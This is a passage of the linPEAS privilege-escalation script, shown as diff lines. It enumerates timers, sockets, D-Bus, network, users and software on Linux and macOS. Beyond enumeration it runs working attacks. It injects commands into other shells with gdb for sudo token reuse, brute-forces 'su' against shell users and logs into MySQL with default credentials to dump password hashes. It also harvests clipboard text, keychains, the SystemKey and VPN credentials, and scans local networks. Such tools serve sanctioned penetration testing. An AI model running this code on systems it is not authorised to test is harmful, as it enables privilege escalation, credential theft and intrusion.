"$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; - else - echo "$s is executing some relative path" - fi - fi - fi - done - if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi - echo "" - - #-- PSC) Timers - print_2title "System timers" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found - echo "" - - #-- PSC) .timer files - print_2title "Analyzing .timer files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do - if ! [ "$IAMROOT" ] && [ -w "$t" ]; then - echo "$t" | sed -${E} "s,.*,${SED_RED},g" - fi - timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) - printf "%s\n" "$timerbinpaths" | while read tb; do - if [ -w "$tb" ]; then - echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" - fi - done - #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" - #for rp in "$relpath"; do - # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" - #done - done - echo "" - - #-- PSC) .socket files - #TODO: .socket files in MACOS are folders - if ! [ "$IAMROOT" ]; then - print_2title "Analyzing .socket files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" - fi - socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') - printf "%s\n" "$socketsbinpaths" | while read sb; do - if [ -w "$sb" ]; then - echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" - fi - done - socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') - printf "%s\n" "$socketslistpaths" | while read sl; do - if [ -w "$sl" ]; then - echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; - fi - done - done - if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then - echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" - fi - if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then - echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" - fi - echo "" - - print_2title "Unix Sockets Listening" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" - # Search sockets using netstat and ss - unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") - fi - if ! [ "$unix_scks_list" ];then - unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) - fi - - # But also search socket files - unix_scks_list2=$(find / -type s 2>/dev/null) - - # Detele repeated dockets and check permissions - (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do - perms="" - if [ -r "$l" ]; then - perms="Read " - fi - if [ -w "$l" ];then - perms="${perms}Write" - fi - if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; - else - echo "$l" | sed -${E} "s,$l,${SED_RED},g" - echo " └─(${RED}${perms}${NC})" - # Try to contact the socket - socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) - if [ $? -eq 0 ]; then - owner=$(ls -l "$s" | cut -d ' ' -f 3) - echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" - echo "$socketcurl" | head -n 30 - fi - fi - done - echo "" - fi - - #-- PSC) Writable and weak policies in D-Bus config files - print_2title "D-Bus config files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - if [ "$PSTORAGE_DBUS" ]; then - printf "%s\n" "$PSTORAGE_DBUS" | while read d; do - for f in $d/*; do - if ! [ "$IAMROOT" ] && [ -w "$f" ]; then - echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" - fi - - genpol=$(grep "" "$f" 2>/dev/null) - if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi - - userpol=$(grep "/dev/null | grep -v "root") - if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #for g in `groups`; do - # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi - #done - grppol=$(grep "/dev/null | grep -v "root") - if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - - #TODO: identify allows in context="default" - done - done - fi - echo "" - - print_2title "D-Bus Service Objects list" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" - dbuslist=$(busctl list 2>/dev/null) - if [ "$dbuslist" ]; then - busctl list | while read line; do - echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; - if ! echo "$line" | grep -qE "$dbuslistG"; then - srvc_object=$(echo $line | cut -d " " -f1) - srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') - if [ "$srvc_object_info" ]; then - echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," - fi - fi - done - else echo_not_found "busctl" - fi - echo "" - echo "" - - - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q Net; then - ########################################### - #---------) Network Information (---------# - ########################################### - print_title "Network Information" - - if [ "$MACOS" ]; then - print_2title "Network Capabilities" - warn_exec system_profiler SPNetworkDataType - echo "" - fi - - #-- NI) Hostname, hosts and DNS - print_2title "Hostname, hosts and DNS" - cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null - warn_exec dnsdomainname 2>/dev/null - echo "" - - #-- NI) /etc/inetd.conf - print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" - (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" - echo "" - - #-- NI) Interfaces - print_2title "Interfaces" - cat /etc/networks 2>/dev/null - (ifconfig || ip a) 2>/dev/null - echo "" - - #-- NI) Neighbours - print_2title "Networks and neighbours" - if [ "$MACOS" ]; then - netstat -rn 2>/dev/null - else - (route || ip n || cat /proc/net/route) 2>/dev/null - fi - (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Firewall status" - warn_exec system_profiler SPFirewallDataType - fi - - #-- NI) Iptables - print_2title "Iptables rules" - (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" - echo "" - - #-- NI) Ports - print_2title "Active Ports" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" - ( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," - echo "" - - #-- NI) MacOS hardware ports - if [ "$MACPEAS" ]; then - print_2title "Hardware Ports" - networksetup -listallhardwareports - echo "" - - print_2title "VLANs" - networksetup -listVLANs - echo "" - - print_2title "Wifi Info" - networksetup -getinfo Wi-Fi - echo "" - - print_2title "Check Enabled Proxies" - scutil --proxy - echo "" - - print_2title "Wifi Proxy URL" - networksetup -getautoproxyurl Wi-Fi - echo "" - - print_2title "Wifi Web Proxy" - networksetup -getwebproxy Wi-Fi - echo "" - - print_2title "Wifi FTP Proxy" - networksetup -getftpproxy Wi-Fi - echo "" - fi - - #-- NI) tcpdump - print_2title "Can I sniff with tcpdump?" - timeout 1 tcpdump >/dev/null 2>&1 - if [ $? -eq 124 ]; then #If 124, then timed out == It worked - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" - echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" - - #-- NI) Internet access - if ! [ "$SUPERFAST" ] && ! [ "$FAST" ] && ! [ "$NOTEXPORT" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then - print_2title "Internet Access?" - check_tcp_80 2>/dev/null & - check_tcp_443 2>/dev/null & - check_icmp 2>/dev/null & - check_dns 2>/dev/null & - wait - echo "" - fi - - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then - if ! [ "$FOUND_NC" ]; then - printf $RED"[-] $SCAN_BAN_BAD\n$NC" - echo "The network is not going to be scanned..." - - else - print_2title "Scanning local networks (using /24)" - - if ! [ "$PING" ] && ![ "$FPING" ]; then - printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" - fi - - select_nc - local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") - printf "%s\n" "$local_ips" | while read local_ip; do - if ! [ -z "$local_ip" ]; then - print_3title "Discovering hosts in $local_ip/24" - - if [ "$PING" ] || [ "$FPING" ]; then - discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp - fi - - discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp - - sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips - rm $Wfolder/.ips.tmp 2>/dev/null - - while read disc_ip; do - me="" - if [ "$disc_ip" = "$local_ip" ]; then - me=" (local)" - fi - - echo "Scanning top ports of ${disc_ip}${me}" - (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null - echo "" - done < $Wfolder/.ips - - rm $Wfolder/.ips 2>/dev/null - echo "" - fi - done - fi - fi - - if [ "$MACOS" ]; then - print_2title "Any MacOS Sharing Service Enabled?" - rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); - scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); - flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); - rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); - rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); - bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); - printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; - echo "" - print_2title "VPN Creds" - system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," - echo "" - - print_2title "Bluetooth Info" - warn_exec system_profiler SPBluetoothDataType - echo "" - - print_2title "Ethernet Info" - warn_exec system_profiler SPEthernetDataType - echo "" - - print_2title "USB Info" - warn_exec system_profiler SPUSBDataType - echo "" - - #Irrelevant to PE - #print_2title "Airport Info" - #warn_exec system_profiler SPAirPortDataType - #echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q UsrI; then - ########################################### - #----------) Users Information (----------# - ########################################### - print_title "Users Information" - - #-- UI) My user - print_2title "My user" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" - (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" - echo "" - - if [ "$MACPEAS" ];then - print_2title "Current user Login and Logout hooks" - defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - echo "" - - print_2title "All Login and Logout hooks" - defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" - defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist - echo "" - - print_2title "Keychains" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" - security list-keychains - echo "" - - print_2title "SystemKey" - ls -l /var/db/SystemKey - if [ -r "/var/db/SystemKey" ]; then - echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - echo "" - fi - - #-- UI) PGP keys? - print_2title "Do I have PGP keys?" - command -v gpg 2>/dev/null || echo_not_found "gpg" - gpg --list-keys 2>/dev/null - command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" - netpgpkeys --list-keys 2>/dev/null - command -v netpgp 2>/dev/null || echo_not_found "netpgp" - echo "" - - #-- UI) Clipboard and highlighted text - print_2title "Clipboard or highlighted text?" - if [ "$(command -v xclip 2>/dev/null)" ]; then - echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - elif [ "$(command -v xsel 2>/dev/null)" ]; then - echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - elif [ "$(command -v pbpaste 2>/dev/null)" ]; then - echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED}," - else echo_not_found "xsel and xclip" - fi - echo "" - - #-- UI) Sudo -l - print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - (echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo" - if [ "$PASSWORD" ]; then - (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo" - fi - ( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers" - if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then - echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW}," - fi - for filename in '/etc/sudoers.d/*'; do - if [ -r "$filename" ]; then - echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g" - grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," - fi - done - echo "" - - #-- UI) Sudo tokens - print_2title "Checking sudo tokens" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens" - ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" - if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g"; - else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g"; - fi - is_gdb="$(command -v gdb 2>/dev/null)" - if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g"; - else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g"; - fi - if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then - echo "Checking for sudo tokens in other shells owned by current user" - for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do - echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) - echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 - if [ -f "/tmp/shrndom32r2r" ]; then - echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; - break - fi - done - if [ -f "/tmp/shrndom32r2r" ]; then - rm -f /tmp/shrndom32r2r 2>/dev/null - else echo "The escalation didn't work... (try again later?)" - fi - fi - echo "" - - #-- UI) Doas - print_2title "Checking doas.conf" - doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null) - if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then - cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," - else echo_not_found "doas.conf" - fi - echo "" - - #-- UI) Pkexec policy - print_2title "Checking Pkexec policy" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2" - (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d" - echo "" - - #-- UI) Superusers - print_2title "Superusers" - awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Users with console - print_2title "Users with console" - if [ "$MACPEAS" ]; then - dscl . list /Users | while read uname; do - ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) - if grep -q "$ushell" /etc/shells; then #Shell user - dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - fi - done - else - no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq) - unexpected_shells="" - printf "%s\n" "$no_shells" | while read f; do - if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then - unexpected_shells="$f\n$unexpected_shells" - fi - done - grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - if [ "$unexpected_shells" ]; then - printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g" - echo "Unexpected users with shells:" - printf "%s\n" "$unexpected_shells" | while read f; do - if [ "$f" ]; then - grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g" - fi - done - fi - fi - echo "" - - #-- UI) All users & groups - print_2title "All users & groups" - if [ "$MACPEAS" ]; then - dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" - else - cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" - fi - echo "" - - #-- UI) Login now - print_2title "Login now" - (w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Last logons - print_2title "Last logons" - (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - - #-- UI) Login info - print_2title "Last time logon each user" - lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - - EXISTS_FINGER="$(command -v finger 2>/dev/null)" - if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then - dscl . list /Users | while read uname; do - ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) - if grep -q "$ushell" /etc/shells; then #Shell user - finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," - echo "" - fi - done - fi - echo "" - - #-- UI) Password policy - print_2title "Password policy" - grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Relevant last user info and user configs" - defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null - echo "" - - print_2title "Guest user status" - sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN}," - echo "" - fi - - #-- UI) Brute su - EXISTS_SUDO="$(command -v sudo 2>/dev/null)" - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then - print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC - POSSIBE_SU_BRUTE=$(check_if_su_brute); - if [ "$POSSIBE_SU_BRUTE" ]; then - SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1) - printf "%s\n" "$SHELLUSERS" | while read u; do - echo " Bruteforcing user $u..." - su_brute_user_num "$u" $PASSTRY - done - else - printf $GREEN"It's not possible to brute-force su.\n\n"$NC - fi - else - print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC - fi - print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q SofI; then - ########################################### - #--------) Software Information (---------# - ########################################### - print_title "Software Information" - - #-- SI) Mysql version - print_2title "MySQL version" - mysql --version 2>/dev/null || echo_not_found "mysql" - echo "" - - #-- SI) Mysql connection root/root - print_list "MySQL connection using default root/root ........... " - mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) - if [ "$mysqlconnect" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - #-- SI) Mysql connection root/toor - print_list "MySQL connection using root/toor ................... " - mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) - if [ "$mysqlconnect" ]; then - echo "Yes" | sed -${E} "s,.*,${SED_RED}," - 